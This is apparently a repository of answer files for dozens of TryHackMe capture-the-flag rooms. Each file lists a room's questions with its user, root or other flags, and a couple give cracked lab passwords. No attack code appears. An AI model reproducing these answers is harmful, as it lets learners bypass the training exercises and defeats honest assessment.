| -------------------------------------------------------------------------------- /rooms/the sticker shop.txt: -------------------------------------------------------------------------------- 1 | The Sticker Shop 2 | https://tryhackme.com/room/thestickershop 3 | 4 | What is the content of flag.txt? 5 | THM{83789a69074f636f64a38879cfcabe8b62305ee6} 6 | -------------------------------------------------------------------------------- /rooms/welcome.txt: -------------------------------------------------------------------------------- 1 | Welcome 2 | https://tryhackme.com/room/hello 3 | 4 | What is the flag text shown on website of the machine you deployed on this task? 5 | flag{connection_verified} 6 | -------------------------------------------------------------------------------- /rooms/wgel ctf.txt: -------------------------------------------------------------------------------- 1 | Wgel CTF 2 | https://tryhackme.com/room/wgelctf 3 | 4 | User flag 5 | 057c67131c3d5e42dd5cd3075b198ff6 6 | 7 | Root flag 8 | b1b968b37519ad1daa6408188649263d 9 | -------------------------------------------------------------------------------- /rooms/willow.txt: -------------------------------------------------------------------------------- 1 | Willow 2 | https://tryhackme.com/room/willow 3 | 4 | User Flag: 5 | THM{beneath_the_weeping_willow_tree} 6 | 7 | Root Flag: 8 | THM{find_a_red_rose_on_the_grave} 9 | -------------------------------------------------------------------------------- /rooms/blueprint.txt: -------------------------------------------------------------------------------- 1 | Blueprint 2 | https://tryhackme.com/room/blueprint 3 | 4 | "Lab" user NTLM hash decrypted 5 | googleplus 6 | 7 | root.txt 8 | THM{aea1e3ce6fe7f89e10cea833ae009bee} 9 | -------------------------------------------------------------------------------- /rooms/bookstore.txt: -------------------------------------------------------------------------------- 1 | Bookstore 2 | https://tryhackme.com/room/bookstoreoc 3 | 4 | User flag 5 | 4ea65eb80ed441adb68246ddf7b964ab 6 | 7 | Root flag 8 | e29b05fba5b2a7e69c24a450893158e3 9 | -------------------------------------------------------------------------------- /rooms/cold vvars.txt: -------------------------------------------------------------------------------- 1 | Cold VVars 2 | https://tryhackme.com/room/coldvvars 3 | 4 | User.txt 5 | ae39f419ce0a3a26f15db5aaa7e446ff 6 | 7 | Root.txt 8 | 42f191b937ea71cd2052a06a7a08585a 9 | -------------------------------------------------------------------------------- /rooms/develpy.txt: -------------------------------------------------------------------------------- 1 | Develpy 2 | https://tryhackme.com/room/bsidesgtdevelpy 3 | 4 | user.txt 5 | cf85ff769cfaaa721758949bf870b019 6 | 7 | root.txt 8 | 9c37646777a53910a347f387dce025ec 9 | -------------------------------------------------------------------------------- /rooms/expose.txt: -------------------------------------------------------------------------------- 1 | Expose 2 | https://tryhackme.com/room/expose 3 | 4 | What is the user flag? 5 | THM{USER_FLAG_1231_EXPOSE} 6 | 7 | What is the root flag? 8 | THM{ROOT_EXPOSED_1001} 9 | -------------------------------------------------------------------------------- /rooms/ledger.txt: -------------------------------------------------------------------------------- 1 | Ledger 2 | https://tryhackme.com/room/ledger 3 | 4 | What is the user flag? 5 | THM{ENUMERATION_IS_THE_KEY} 6 | 7 | What is the root flag? 8 | THM{THE_BYPASS_IS_CERTIFIED!} 9 | -------------------------------------------------------------------------------- /rooms/library.txt: -------------------------------------------------------------------------------- 1 | Library 2 | https://tryhackme.com/room/bsidesgtlibrary 3 | 4 | user.txt 5 | 6d488cbb3f111d135722c33cb635f4ec 6 | 7 | root.txt 8 | e8c8c6c256c35515d1d344ee0488c617 9 | -------------------------------------------------------------------------------- /rooms/madness.txt: -------------------------------------------------------------------------------- 1 | Madness 2 | https://tryhackme.com/room/madness 3 | 4 | user.txt 5 | THM{d5781e53b130efe2f94f9b0354a5e4ea} 6 | 7 | root.txt 8 | THM{5ecd98aa66a6abb670184d7547c8124a} 9 | -------------------------------------------------------------------------------- /rooms/relevant.txt: -------------------------------------------------------------------------------- 1 | Relevant 2 | https://tryhackme.com/room/relevant 3 | 4 | User Flag 5 | THM{fdk4ka34vk346ksxfr21tg789ktf45} 6 | 7 | Root Flag 8 | THM{1fk5kf469devly1gl320zafgl345pv} 9 | -------------------------------------------------------------------------------- /rooms/the blob blog.txt: -------------------------------------------------------------------------------- 1 | The Blob Blog 2 | https://tryhackme.com/room/theblobblog 3 | 4 | User Flag 5 | THM{C0NGR4t$_g3++ing_this_fur} 6 | 7 | Root Flag 8 | THM{G00D_J0B_G3++1NG+H3R3!} 9 | -------------------------------------------------------------------------------- /rooms/the impossible challenge.txt: -------------------------------------------------------------------------------- 1 | The Impossible Challenge 2 | https://tryhackme.com/room/theimpossiblechallenge 3 | 4 | Flag is in the format THM{} 5 | THM{Zero_Width_Characters_EZPZ} 6 | -------------------------------------------------------------------------------- /rooms/thompson.txt: -------------------------------------------------------------------------------- 1 | Thompson 2 | https://tryhackme.com/room/bsidesgtthompson 3 | 4 | user.txt 5 | 39400c90bc683a41a8935e4719f181bf 6 | 7 | root.txt 8 | d89d5391984c0450a95497153ae7ca3a 9 | -------------------------------------------------------------------------------- /rooms/anonforce.txt: -------------------------------------------------------------------------------- 1 | Anonforce 2 | https://tryhackme.com/room/bsidesgtanonforce 3 | 4 | user.txt 5 | 606083fd33beb1284fc51f411a706af8 6 | 7 | root.txt 8 | f706456440c7af4187810c31c6cebdce 9 | -------------------------------------------------------------------------------- /rooms/brute.txt: -------------------------------------------------------------------------------- 1 | Brute 2 | https://tryhackme.com/room/ettubrute 3 | 4 | What is the user flag? 5 | THM{PoI$0n_tH@t_L0g} 6 | 7 | What is the root flag? 8 | THM{C0mm@nD_Inj3cT1on_4_D@_BruT3} 9 | -------------------------------------------------------------------------------- /rooms/burp suite extensions.txt: -------------------------------------------------------------------------------- 1 | Burp Suite: Extensions 2 | https://tryhackme.com/room/burpsuiteextensions 3 | 4 | Are extensions invoked in ascending (A) or descending (D) order? 5 | D 6 | 7 | -------------------------------------------------------------------------------- /rooms/enterprize.txt: -------------------------------------------------------------------------------- 1 | EnterPrize 2 | https://tryhackme.com/room/enterprize 3 | 4 | user.txt 5 | THM{a99acf52687be464db48eca3b3359572} 6 | 7 | root.txt 8 | THM{568a171c9460d2b3871618b9d5232919} -------------------------------------------------------------------------------- /rooms/hack back.txt: -------------------------------------------------------------------------------- 1 | Hack Back 2 | https://tryhackme.com/room/hackback 3 | 4 | What is the root flag? 5 | THM{TIME_TO_GET_BACK_THE_MONEY} 6 | 7 | What is the final flag? 8 | THM{HELLO_WEB3} 9 | -------------------------------------------------------------------------------- /rooms/iron corp.txt: -------------------------------------------------------------------------------- 1 | Iron Corp 2 | https://tryhackme.com/room/ironcorp 3 | 4 | user.txt 5 | thm{09b408056a13fc222f33e6e4cf599f8c} 6 | 7 | root.txt 8 | thm{a1f936a086b367761cc4e7dd6cd2e2bd} 9 | -------------------------------------------------------------------------------- /rooms/keldagrim.txt: -------------------------------------------------------------------------------- 1 | Keldagrim 2 | https://tryhackme.com/room/keldagrim 3 | 4 | user.txt 5 | thm{d55ac4d0a728741d7b8c23b999e73cf3} 6 | 7 | root.txt 8 | thm{bf2a087f833b58df233c0f24eac3aec5} 9 | -------------------------------------------------------------------------------- /rooms/safezone.txt: -------------------------------------------------------------------------------- 1 | SafeZone 2 | https://tryhackme.com/room/safezone 3 | 4 | user flag 5 | THM{c296539f3286a899d8b3f6632fd62274} 6 | 7 | root flag 8 | THM{63a9f0ea7bb98050796b649e85481845} 9 | -------------------------------------------------------------------------------- /rooms/sea surfer.txt: -------------------------------------------------------------------------------- 1 | Sea Surfer 2 | https://tryhackme.com/room/seasurfer 3 | 4 | What is user.txt? 5 | THM{SSRFING_TO_LFI_TO_RCE} 6 | 7 | What is root.txt? 8 | THM{STEALING_SUDO_TOKENS} 9 | -------------------------------------------------------------------------------- /rooms/services.txt: -------------------------------------------------------------------------------- 1 | Services 2 | https://tryhackme.com/room/services 3 | 4 | What is the user flag? 5 | THM{ASr3p_R0aSt1n6} 6 | 7 | What is the Administrator flag? 8 | THM{S3rv3r_0p3rat0rS} 9 | -------------------------------------------------------------------------------- /rooms/airplane.txt: -------------------------------------------------------------------------------- 1 | Airplane 2 | https://tryhackme.com/room/airplane 3 | 4 | What is user.txt 5 | eebfca2ca5a2b8a56c46c781aeea7562 6 | 7 | What is root.txt 8 | 190dcbeb688ce5fe029f26a1e5fce002 9 | -------------------------------------------------------------------------------- /rooms/billing.txt: -------------------------------------------------------------------------------- 1 | Billing 2 | https://tryhackme.com/room/billing 3 | 4 | What is user.txt? 5 | THM{4a6831d5f124b25eefb1e92e0f0da4ca} 6 | 7 | What is root.txt? 8 | THM{33ad5b530e71a172648f424ec23fae60} 9 | -------------------------------------------------------------------------------- /rooms/creative.txt: -------------------------------------------------------------------------------- 1 | Creative 2 | https://tryhackme.com/room/creative 3 | 4 | What is user.txt? 5 | 9a1ce90a7653d74ab98630b47b8b4a84 6 | 7 | What is root.txt? 8 | 992bfd94b90da48634aed182aae7b99f 9 | -------------------------------------------------------------------------------- /rooms/jacob the boss.txt: -------------------------------------------------------------------------------- 1 | Jacob the Boss 2 | https://tryhackme.com/room/jacobtheboss 3 | 4 | user.txt 5 | f4d491f280de360cc49e26ca1587cbcc 6 | 7 | root.txt 8 | 29a5641eaa0c01abe5749608c8232806 9 | -------------------------------------------------------------------------------- /rooms/metamorphosis.txt: -------------------------------------------------------------------------------- 1 | Metamorphosis 2 | https://tryhackme.com/room/metamorphosis 3 | 4 | user.txt 5 | 4ce794a9d0019c1f684e07556821e0b0 6 | 7 | root.txt 8 | 7ffca2ec63534d165525bf37d91b4ff4 9 | -------------------------------------------------------------------------------- /rooms/mindgames.txt: -------------------------------------------------------------------------------- 1 | Mindgames 2 | https://tryhackme.com/room/mindgames 3 | 4 | User flag. 5 | thm{411f7d38247ff441ce4e134b459b6268} 6 | 7 | Root flag. 8 | thm{1974a617cc84c5b51411c283544ee254} 9 | -------------------------------------------------------------------------------- /rooms/misguided ghosts.txt: -------------------------------------------------------------------------------- 1 | Misguided Ghosts 2 | https://tryhackme.com/room/misguidedghosts 3 | 4 | What is the user flag? 5 | {d0ck3r_35c4p3} 6 | 7 | What is the root flag? 8 | {p1v0t1ng_15_fun} 9 | -------------------------------------------------------------------------------- /rooms/pyrat.txt: -------------------------------------------------------------------------------- 1 | Pyrat 2 | https://tryhackme.com/room/pyrat 3 | 4 | What is the user flag? 5 | 996bdb1f619a68361417cabca5454705 6 | 7 | What is the root flag? 8 | ba5ed03e9e74bb98054438480165e221 9 | -------------------------------------------------------------------------------- /rooms/reset.txt: -------------------------------------------------------------------------------- 1 | Reset 2 | https://tryhackme.com/room/resetui 3 | 4 | What is the user flag? 5 | THM{AUTOMATION_WILL_REPLACE_US} 6 | 7 | What is the root flag? 8 | THM{RE_RE_RE_SET_AND_DELEGATE} 9 | -------------------------------------------------------------------------------- /rooms/smol.txt: -------------------------------------------------------------------------------- 1 | Smol 2 | https://tryhackme.com/room/smol 3 | 4 | What is the user flag? 5 | 45edaec653ff9ee06236b7ce72b86963 6 | 7 | What is the root flag? 8 | bf89ea3ea01992353aef1f576214d4e4 9 | -------------------------------------------------------------------------------- /rooms/spring4shell cve-2022-22965.txt: -------------------------------------------------------------------------------- 1 | Spring4Shell: CVE-2022-22965 2 | https://tryhackme.com/room/spring4shell 3 | 4 | What is the flag in /root/flag.txt? 5 | THM{NjAyNzkyMjU0MzA1ZWMwZDdiM2E5YzFm} 6 | -------------------------------------------------------------------------------- /rooms/valley.txt: -------------------------------------------------------------------------------- 1 | Valley 2 | https://tryhackme.com/room/valleype 3 | 4 | What is the user flag? 5 | THM{k@l1_1n_th3_v@lley} 6 | 7 | What is the root flag? 8 | THM{v@lley_0f_th3_sh@d0w_0f_pr1v3sc} 9 | -------------------------------------------------------------------------------- /koth/tyler.txt: -------------------------------------------------------------------------------- 1 | Flags 2 | 2308b0cccea3f2a187a89a9f3155a3a4 3 | 562216ebd6128e6e3ea13dbe6bcaf46a 4 | 751ad4b411730e6596d0cc4ae9245106 5 | 991c65538b9afaf2494f4552b915c948 6 | 9a2d57cc33cd052a88fd5ba25d1c953c -------------------------------------------------------------------------------- /rooms/athena.txt: -------------------------------------------------------------------------------- 1 | Athena 2 | https://tryhackme.com/room/4th3n4 3 | 4 | What is the user flag? 5 | 857c4a4fbac638afb6c7ee45eb3e1a28 6 | 7 | What is the root flag? 8 | aecd4a3497cd2ec4bc71a2315030bd48 9 | -------------------------------------------------------------------------------- /rooms/carpe diem 1.txt: -------------------------------------------------------------------------------- 1 | Carpe Diem 1 2 | https://tryhackme.com/room/carpediem1 3 | 4 | What is flag 1? 5 | THM{So_Far_So_Good_So_What} 6 | 7 | What is flag 2? 8 | THM{You_Found_TheFlag_Well_done!} 9 | -------------------------------------------------------------------------------- /rooms/cyberlens.txt: -------------------------------------------------------------------------------- 1 | CyberLens 2 | https://tryhackme.com/room/cyberlensp6 3 | 4 | What is the user flag? 5 | THM{T1k4-CV3-f0r-7h3-w1n} 6 | 7 | What is the admin flag? 8 | THM{3lev@t3D-4-pr1v35c!} 9 | -------------------------------------------------------------------------------- /rooms/dirty pipe cve-2022-0847.txt: -------------------------------------------------------------------------------- 1 | Dirty Pipe: CVE-2022-0847 2 | https://tryhackme.com/room/dirtypipe 3 | 4 | What is the flag found in the /root/flag.txt file? 5 | THM{MmU4Zjg0NDdjNjFiZWM5ZjUyZGEyMzlm} 6 | -------------------------------------------------------------------------------- /rooms/lookup.txt: -------------------------------------------------------------------------------- 1 | Lookup 2 | https://tryhackme.com/room/lookup 3 | 4 | What is the user flag? 5 | 38375fb4dd8baa2b2039ac03d92b820e 6 | 7 | What is the root flag? 8 | 5a285a9f257e45c68bb6c9f9f57d18e8 9 | -------------------------------------------------------------------------------- /rooms/ollie.txt: -------------------------------------------------------------------------------- 1 | Ollie 2 | https://tryhackme.com/room/ollie 3 | 4 | What is the user.txt flag? 5 | THM{Ollie_boi_is_daH_Cut3st} 6 | 7 | What is the root.txt flag? 8 | THM{Ollie_Luvs_Chicken_Fries} 9 | -------------------------------------------------------------------------------- /rooms/road.txt: -------------------------------------------------------------------------------- 1 | Road 2 | https://tryhackme.com/room/road 3 | 4 | What is the user.txt flag? 5 | 63191e4ece37523c9fe6bb62a5364d45 6 | 7 | What is the root.txt flag? 8 | 3a62d897c40a815ecbe267df2f533ac6 9 | -------------------------------------------------------------------------------- /rooms/temple.txt: -------------------------------------------------------------------------------- 1 | Temple 2 | https://tryhackme.com/room/temple 3 | 4 | Find flag1.txt 5 | 7362bee1e78243f4811f26565137d5e20cbd9af0 6 | 7 | Find flag2.txt 8 | f620630155081293669dbb7949f975fa9386f1cd 9 | -------------------------------------------------------------------------------- /rooms/unbaked pie.txt: -------------------------------------------------------------------------------- 1 | Unbaked Pie 2 | https://tryhackme.com/room/unbakedpie 3 | 4 | User Flag 5 | THM{ce778dd41bec31e1daed77ebebcd7423} 6 | 7 | Root Flag 8 | THM{1ff4c893b3d8830c1e188a3728e90a5f} 9 | -------------------------------------------------------------------------------- /rooms/weasel.txt: -------------------------------------------------------------------------------- 1 | Weasel 2 | https://tryhackme.com/room/weasel 3 | 4 | What is the user.txt flag? 5 | THM{w3as3ls_@nd_pyth0ns} 6 | 7 | What is the root.txt flag? 8 | THM{evelated_w3as3l_l0ngest_boi} 9 | -------------------------------------------------------------------------------- /rooms/wekor.txt: -------------------------------------------------------------------------------- 1 | Wekor 2 | https://tryhackme.com/room/wekorra 3 | 4 | What is the user flag? 5 | 1a26a6d51c0172400add0e297608dec6 6 | 7 | What is the root flag? 8 | f4e788f87cc3afaecbaf0f0fe9ae6ad7 9 | -------------------------------------------------------------------------------- /rooms/zeno.txt: -------------------------------------------------------------------------------- 1 | Zeno 2 | https://tryhackme.com/room/zeno 3 | 4 | Content of user.txt 5 | THM{070cab2c9dc622e5d25c0709f6cb0510} 6 | 7 | Content of root.txt 8 | THM{b187ce4b85232599ca72708ebde71791} 9 | -------------------------------------------------------------------------------- /rooms/cat pictures.txt: -------------------------------------------------------------------------------- 1 | Cat Pictures 2 | https://tryhackme.com/room/catpictures 3 | 4 | Flag 1 5 | 7cf90a0e7c5d25f1a827d3efe6fe4d0edd63cca9 6 | 7 | Root Flag 8 | 4a98e43d78bab283938a06f38d2ca3a3c53f0476 9 | -------------------------------------------------------------------------------- /rooms/gatekeeper.txt: -------------------------------------------------------------------------------- 1 | Gatekeeper 2 | https://tryhackme.com/room/gatekeeper 3 | 4 | Locate and find the User Flag. 5 | {H4lf_W4y_Th3r3} 6 | 7 | Locate and find the Root Flag 8 | {Th3_M4y0r_C0ngr4tul4t3s_U} 9 | -------------------------------------------------------------------------------- /rooms/kitty.txt: -------------------------------------------------------------------------------- 1 | Kitty 2 | https://tryhackme.com/room/kitty 3 | 4 | What is the user flag? 5 | THM{31e606998972c3c6baae67bab463b16a} 6 | 7 | What is the root flag? 8 | THM{581bfc26b53f2e167a05613eecf039bb} 9 | -------------------------------------------------------------------------------- /rooms/mkingdom.txt: -------------------------------------------------------------------------------- 1 | mKingdom 2 | https://tryhackme.com/room/mkingdom 3 | 4 | What is user.txt? 5 | thm{030a769febb1b3291da1375234b84283} 6 | 7 | What is root.txt? 8 | thm{e8b2f52d88b9930503cc16ef48775df0} 9 | -------------------------------------------------------------------------------- /rooms/plotted-tms.txt: -------------------------------------------------------------------------------- 1 | Plotted-TMS 2 | https://tryhackme.com/room/plottedtms 3 | 4 | What is user.txt? 5 | 77927510d5edacea1f9e86602f1fbadb 6 | 7 | What is root.txt? 8 | 53f85e2da3e874426fa059040a9bdcab 9 | -------------------------------------------------------------------------------- /rooms/rabbit store.txt: -------------------------------------------------------------------------------- 1 | Rabbit Store 2 | https://tryhackme.com/room/rabbitstore 3 | 4 | What is user.txt? 5 | 98d3a30fa86523c580144d317be0c47e 6 | 7 | What is root.txt? 8 | eabf7a0b05d3f2028f3e0465d2fd0852 9 | -------------------------------------------------------------------------------- /rooms/racetrack bank.txt: -------------------------------------------------------------------------------- 1 | Racetrack Bank 2 | https://tryhackme.com/room/racetrackbank 3 | 4 | User flag 5 | THM{178c31090a7e0f69560730ad21d90e70} 6 | 7 | Root flag 8 | THM{55a9d6099933f6c456ccb2711b8766e3} 9 | -------------------------------------------------------------------------------- /rooms/second.txt: -------------------------------------------------------------------------------- 1 | Second 2 | https://tryhackme.com/room/fearsecond 3 | 4 | What is the user flag? 5 | THM{WaF_wAf_2nd_0rd3r_SQl_1nJ3ct1on} 6 | 7 | What is the root flag? 8 | THM{M1nd_Y0uR_AcC3s$_C0nTr0l} 9 | -------------------------------------------------------------------------------- /rooms/all in one.txt: -------------------------------------------------------------------------------- 1 | All in One 2 | https://tryhackme.com/room/allinonemj 3 | 4 | user.txt 5 | THM{49jg666alb5e76shrusn49jg666alb5e76shrusn} 6 | 7 | root.txt 8 | THM{uem2wigbuem2wigb68sn2j1ospi868sn2j1ospi8} 9 | -------------------------------------------------------------------------------- /rooms/biteme.txt: -------------------------------------------------------------------------------- 1 | biteme 2 | https://tryhackme.com/room/biteme 3 | 4 | What is the user flag? 5 | THM{6fbf1fb7241dac060cd3abba70c33070} 6 | 7 | What is the root flag? 8 | THM{0e355b5c907ef7741f40f4a41cc6678d} 9 | -------------------------------------------------------------------------------- /rooms/brooklyn nine nine.txt: -------------------------------------------------------------------------------- 1 | Brooklyn Nine Nine 2 | https://tryhackme.com/room/brooklynninenine 3 | 4 | User flag 5 | ee11cbb19052e40b07aac0ca060c23ee 6 | 7 | Root flag 8 | 63a9f0ea7bb98050796b649e85481845 9 | -------------------------------------------------------------------------------- /rooms/bypass disable functions.txt: -------------------------------------------------------------------------------- 1 | Bypass Disable Functions 2 | https://tryhackme.com/room/bypassdisablefunctions 3 | 4 | Compromise the machine and locate the flag.txt 5 | thm{bypass_d1sable_functions_1n_php} 6 | -------------------------------------------------------------------------------- /rooms/chill hack.txt: -------------------------------------------------------------------------------- 1 | Chill Hack 2 | https://tryhackme.com/room/chillhack 3 | 4 | User Flag 5 | {USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww} 6 | 7 | Root Flag 8 | {ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg} 9 | -------------------------------------------------------------------------------- /rooms/git and crumpets.txt: -------------------------------------------------------------------------------- 1 | Git and Crumpets 2 | https://tryhackme.com/room/gitandcrumpets 3 | 4 | User Flag 5 | thm{fd7ab9ffd409064f257cd70cf3d6aa16} 6 | 7 | Root Flag 8 | thm{6320228dd9e315f283b75887240dc6a1} 9 | -------------------------------------------------------------------------------- /rooms/haskhell.txt: -------------------------------------------------------------------------------- 1 | HaskHell 2 | https://tryhackme.com/room/haskhell 3 | 4 | Get the flag in the user.txt file. 5 | flag{academic_dishonesty} 6 | 7 | Obtain the flag in root.txt 8 | flag{im_purely_functional} 9 | -------------------------------------------------------------------------------- /rooms/hijack.txt: -------------------------------------------------------------------------------- 1 | Hijack 2 | https://tryhackme.com/room/hijack 3 | 4 | What is the user flag? 5 | THM{fdc8cd4cff2c19e0d1022e78481ddf36} 6 | 7 | What is the root flag? 8 | THM{b91ea3e8285157eaf173d88d0a73ed5a} 9 | -------------------------------------------------------------------------------- /rooms/inferno.txt: -------------------------------------------------------------------------------- 1 | Inferno 2 | https://tryhackme.com/room/inferno 3 | 4 | Locate and find local.txt 5 | 77f6f3c544ec0811e2d1243e2e0d1835 6 | 7 | Locate and find proof.txt 8 | f332678ed0d0767d7434b8516a7c6144 9 | -------------------------------------------------------------------------------- /rooms/mustacchio.txt: -------------------------------------------------------------------------------- 1 | Mustacchio 2 | https://tryhackme.com/room/mustacchio 3 | 4 | What is the user flag? 5 | 62d77a4d5f97d47c5aa38b3b2651b831 6 | 7 | What is the root flag? 8 | 3223581420d906c4dd1a5f9b530393a5 9 | -------------------------------------------------------------------------------- /rooms/peak hill.txt: -------------------------------------------------------------------------------- 1 | Peak Hill 2 | https://tryhackme.com/room/peakhill 3 | 4 | What is the user flag? 5 | f1e13335c47306e193212c98fc07b6a0 6 | 7 | What is the root flag? 8 | e88f0a01135c05cf0912cf4bc335ee28 9 | -------------------------------------------------------------------------------- /rooms/publisher.txt: -------------------------------------------------------------------------------- 1 | Publisher 2 | https://tryhackme.com/room/publisher 3 | 4 | What is the user flag? 5 | fa229046d44eda6a3598c73ad96f4ca5 6 | 7 | What is the root flag? 8 | 3a4225cc9e85709adda6ef55d6a4f2ca 9 | -------------------------------------------------------------------------------- /rooms/revenge.txt: -------------------------------------------------------------------------------- 1 | Revenge 2 | https://tryhackme.com/room/revenge 3 | 4 | flag1 5 | thm{br3ak1ng_4nd_3nt3r1ng} 6 | 7 | flag2 8 | thm{4lm0st_th3re} 9 | 10 | flag3 11 | thm{m1ss10n_acc0mpl1sh3d} 12 | -------------------------------------------------------------------------------- /rooms/whyhackme.txt: -------------------------------------------------------------------------------- 1 | WhyHackMe 2 | https://tryhackme.com/room/whyhackme 3 | 4 | What is the user flag? 5 | 1ca4eb201787acbfcf9e70fca87b866a 6 | 7 | What is the root flag? 8 | 4dbe2259ae53846441cc2479b5475c72 9 | -------------------------------------------------------------------------------- /rooms/year of the dog.txt: -------------------------------------------------------------------------------- 1 | Year of the Dog 2 | https://tryhackme.com/room/yearofthedog 3 | 4 | User Flag 5 | THM{OTE3MTQyNTM5NzRiN2VjNTQyYWM2M2Ji} 6 | 7 | Root Flag 8 | THM{MzlhNGY5YWM0ZTU5ZGQ0OGI0YTc0OWRh} 9 | -------------------------------------------------------------------------------- /rooms/year of the owl.txt: -------------------------------------------------------------------------------- 1 | Year of the Owl 2 | https://tryhackme.com/room/yearoftheowl 3 | 4 | User Flag 5 | THM{Y2I0NDJjODY2NTc2YmI2Y2U4M2IwZTBl} 6 | 7 | Admin Flag 8 | THM{YWFjZTM1MjFiZmRiODgyY2UwYzZlZWM2} 9 | -------------------------------------------------------------------------------- /rooms/aster.txt: -------------------------------------------------------------------------------- 1 | Aster 2 | https://tryhackme.com/room/aster 3 | 4 | Compromise the machine and locate user.txt 5 | thm{bas1c_aster1ck_explotat1on} 6 | 7 | Reverse file and get root.txt 8 | thm{fa1l_revers1ng_java} 9 | -------------------------------------------------------------------------------- /rooms/avenger.txt: -------------------------------------------------------------------------------- 1 | AVenger 2 | https://tryhackme.com/room/avenger 3 | 4 | Which is the user flag? 5 | THM{WITH_GREAT_POWER_COMES_GREAT_RESPONSIBILITY} 6 | 7 | Which is the root flag? 8 | THM{I_CAN_DO_THIS_ALL_DAY} 9 | -------------------------------------------------------------------------------- /rooms/extracted.txt: -------------------------------------------------------------------------------- 1 | Extracted 2 | https://tryhackme.com/room/extractedroom 3 | 4 | What's the initial part of the password? 5 | NoWaYIcanF0rGetThis123 6 | 7 | What's the flag? 8 | THM{B3tt3r_Upd4t3_Y0ur_K33p455} 9 | -------------------------------------------------------------------------------- /rooms/hc0n christmas ctf.txt: -------------------------------------------------------------------------------- 1 | hc0n Christmas CTF 2 | https://tryhackme.com/room/hc0nchristmasctf 3 | 4 | What is the user flag? 5 | thm{hc0n_christmas_2019!!!} 6 | 7 | What is the root flag? 8 | thm{3xplo1t_my_m1nd} 9 | -------------------------------------------------------------------------------- /rooms/jax sucks alot..............txt: -------------------------------------------------------------------------------- 1 | Jax sucks alot............. 2 | https://tryhackme.com/room/jason 3 | 4 | user.txt 5 | 0ba48780dee9f5677a4461f588af217c 6 | 7 | root.txt 8 | 2cd5a9fd3a0024bfa98d01d69241760e 9 | -------------------------------------------------------------------------------- /rooms/lockdown.txt: -------------------------------------------------------------------------------- 1 | Lockdown 2 | https://tryhackme.com/room/lockdown 3 | 4 | What is the user flag? 5 | THM{w4c1F5AuUNhHCJRtiGtRqZyp0QJDIbWS} 6 | 7 | What is the root flag? 8 | THM{IQ23Em4VGX91cvxsIzatpUvrW9GZZJxm} 9 | -------------------------------------------------------------------------------- /rooms/opacity.txt: -------------------------------------------------------------------------------- 1 | Opacity 2 | https://tryhackme.com/room/opacity 3 | 4 | What is the local.txt flag? 5 | 6661b61b44d234d230d06bf5b3c075e2 6 | 7 | What is the proof.txt flag? 8 | ac0d56f93202dd57dcb2498c739fd20e 9 | -------------------------------------------------------------------------------- /rooms/smag grotto.txt: -------------------------------------------------------------------------------- 1 | Smag Grotto 2 | https://tryhackme.com/room/smaggrotto 3 | 4 | What is the user flag? 5 | iusGorV7EbmxM5AuIe2w499msaSuqU3j 6 | 7 | What is the root flag? 8 | uJr6zRgetaniyHVRqqL58uRasybBKz2T 9 | -------------------------------------------------------------------------------- /rooms/tor.txt: -------------------------------------------------------------------------------- 1 | Tor 2 | https://tryhackme.com/room/torforbeginners 3 | 4 | What is the search engine at the following onion address: https://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onion/ 5 | DuckDuckGo 6 | -------------------------------------------------------------------------------- /rooms/aratus.txt: -------------------------------------------------------------------------------- 1 | Aratus 2 | https://tryhackme.com/room/aratus 3 | 4 | What is the user.txt flag? 5 | THM{ba8d3b87bfdb9d10115cbe24feabbc20} 6 | 7 | What is the root.txt flag? 8 | THM{d8afc85983603342f6c6979b20e06cf6} 9 | -------------------------------------------------------------------------------- /rooms/bandit.txt: -------------------------------------------------------------------------------- 1 | Bandit 2 | https://tryhackme.com/room/bandit 3 | 4 | What is the user flag? 5 | THM{ALL_THIS_ESCAPING_MAKES_ME_TIRED_AM_I_DONE?} 6 | 7 | What is the root flag? 8 | THM{FULL_PRIVILEGES_HERE_THE_ESCAPE_IS_DONE} 9 | -------------------------------------------------------------------------------- /rooms/biblioteca.txt: -------------------------------------------------------------------------------- 1 | Biblioteca 2 | https://tryhackme.com/room/biblioteca 3 | 4 | What is the user flag? 5 | THM{G0Od_OLd_SQL_1nj3ct10n_&_w3@k_p@sSw0rd$} 6 | 7 | What is the root flag? 8 | THM{PytH0n_LiBr@RY_H1j@acKIn6} 9 | -------------------------------------------------------------------------------- /rooms/gamingserver.txt: -------------------------------------------------------------------------------- 1 | GamingServer 2 | https://tryhackme.com/room/gamingserver 3 | 4 | What is the user flag? 5 | a5c2ff8b9c2e3d4fe9d4ff2f1a5a6e7e 6 | 7 | What is the root flag? 8 | 2e337b8c9f3aff0c2b3e8d4e6a7c88fc 9 | -------------------------------------------------------------------------------- /rooms/lazyadmin.txt: -------------------------------------------------------------------------------- 1 | LazyAdmin 2 | https://tryhackme.com/room/lazyadmin 3 | 4 | What is the user flag? 5 | THM{63e5bce9271952aad1113b6f1ac28a07} 6 | 7 | What is the root flag? 8 | THM{6637f41d0177b6f37cb20d775124699f} 9 | -------------------------------------------------------------------------------- /rooms/looking glass.txt: -------------------------------------------------------------------------------- 1 | Looking Glass 2 | https://tryhackme.com/room/lookingglass 3 | 4 | Get the user flag. 5 | thm{65d3710e9d75d5f346d2bac669119a23} 6 | 7 | Get the root flag. 8 | thm{bc2337b6f97d057b01da718ced6ead3f} 9 | -------------------------------------------------------------------------------- /rooms/lumberjack turtle.txt: -------------------------------------------------------------------------------- 1 | Lumberjack Turtle 2 | https://tryhackme.com/room/lumberjackturtle 3 | 4 | What is the first flag? 5 | THM{LOG4SHELL_FTW} 6 | 7 | What is the "real" root flag? 8 | THM{C0NT41N3R_3SC4P3_FTW} 9 | -------------------------------------------------------------------------------- /rooms/plotted-lms.txt: -------------------------------------------------------------------------------- 1 | Plotted-LMS 2 | https://tryhackme.com/room/plottedlms 3 | 4 | What is the user.txt flag? 5 | 7e0345c7c7c46668ad7d147ef53ce250 6 | 7 | What is the root.txt flag? 8 | 26d7752933d9ffcdbcbe4f640f54d8c2 9 | -------------------------------------------------------------------------------- /rooms/takedown.txt: -------------------------------------------------------------------------------- 1 | Takedown 2 | https://tryhackme.com/room/takedown 3 | 4 | Enter the value of user.txt 5 | THM{c2_servers_have_vulnerabilities_t00} 6 | 7 | Enter the value of root.txt 8 | THM{th3_r00t_of_the_pr0blem} 9 | -------------------------------------------------------------------------------- /rooms/toc2.txt: -------------------------------------------------------------------------------- 1 | toc2 2 | https://tryhackme.com/room/toc2 3 | 4 | Find and retrieve the user.txt flag 5 | thm{63616d70657276616e206c696665} 6 